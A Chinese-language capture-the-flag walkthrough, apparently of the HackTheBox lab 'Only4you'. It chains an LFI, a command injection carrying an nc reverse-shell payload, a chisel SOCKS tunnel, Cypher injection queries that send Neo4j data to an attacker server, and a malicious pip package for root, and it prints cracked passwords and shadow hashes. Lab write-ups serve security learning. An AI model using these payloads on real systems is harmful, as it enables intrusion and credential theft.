基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.210
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-24 10:24 CST
Nmap scan report for 10.10.11.210
Host is up (0.093s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e883e0a9fd43df38198aaa35438411ec (RSA)
|   256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_  256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.69 seconds

80

需要加hosts,一个官网:

1
10.10.11.210 only4you.htb

子域名扫描

子域名发现beta:

1
2
3
4
ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://only4you.htb/" -H 'Host: FUZZ.only4you.htb' -fs 178

[Status: 200, Size: 2191, Words: 370, Lines: 52, Duration: 299ms]
    * FUZZ: beta

beta.only4you.htb

同样加hosts后访问,提供一份代码下载:

beta source

根据代码可以知道是flask 应用,download里发现LFI,不能 出现..,不能以../开头,但可以直接使用绝对路径:

LFI

一步步读文件:

1
2
3
/etc/nginx/sites-available/default
/var/www/only4you.htb/app.py
/var/www/only4you.htb/form.py

发现email的domain拼接到执行的命令中,存在一些过滤, 但注意判断方法,只要匹配到符合正则的字符串就可以继续进行后续处理,导致命令注入:

命令注入 shell

利用命令注入得到www-data shell:

1
1@1.com|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f

socks proxy

简单的枚举发现本地端口一些服务,打通代理:

1
2
3
4
5
6
7
8
wget http://10.10.14.8:7777/chisel_1.7.6_linux_amd64
chmod +x chisel_1.7.6_linux_amd64

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# target
./chisel_1.7.6_linux_amd64 client 10.10.14.8:9999 R:socks

info

gogs 3000

3000端口是gogs:

Neo4j 7474

7474端口是neo4j:

8001

8001需要登录,简单的admin:admin进去:

Cypher Injection

根据已有信息,8001的服务应该是使用的neo4j,尝试neo4j的Cypher Injection:

1
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.8:7777/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

后面就是一步步获取信息,得到一些用户名和密码hash:

1
2
3
' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://10.10.14.8:7777/?label='+label as l RETURN 0 as _0 //

' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.8:7777/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

得到的hash破解出密码:

1
2
admin a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 ThisIs4You
john 8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 admin

user flag & Gogs

得到的账号密码组合后可以登录ssh以及gogs:

1
john : ThisIs4You

user flag

john用户目录得到user flag:

提权信息

检查sudo发现是pip从gogs是那里下载:

很明显是让我们通过gogs托管一个恶意包,然后pip去执行,虽然字面上是download,但实际上是会去运行代码的:

提权 & root flag

修改demo里setup.py中的代码,打包,传到gogs上:

1
2
3
4
5
6
pip3 install build
python3 -m build

http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz

sudo /usr/bin/pip3 download http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz

shadow

1
2
root:$6$TJLQffVnCXmnRBpq$Shtj6r4nJt672cmV2bhnlK9wb6YlI1tKpJoupUoVM/LFd7vmbLuDX4jtlYW3Lcft2sjWmHk5h58Q8vaFDOtFR.:19326:0:99999:7:::
john:$6$BBuIQ1RjM9BXy2zw$5.O1009Bf4oXy/qGS5dp9U514X5GJMbkYBGgcWlmTVCzn3H.E6wF1cVAmjZzf8UCExE0dmfxGylCix6q29icq0:19326:0:99999:7:::

参考资料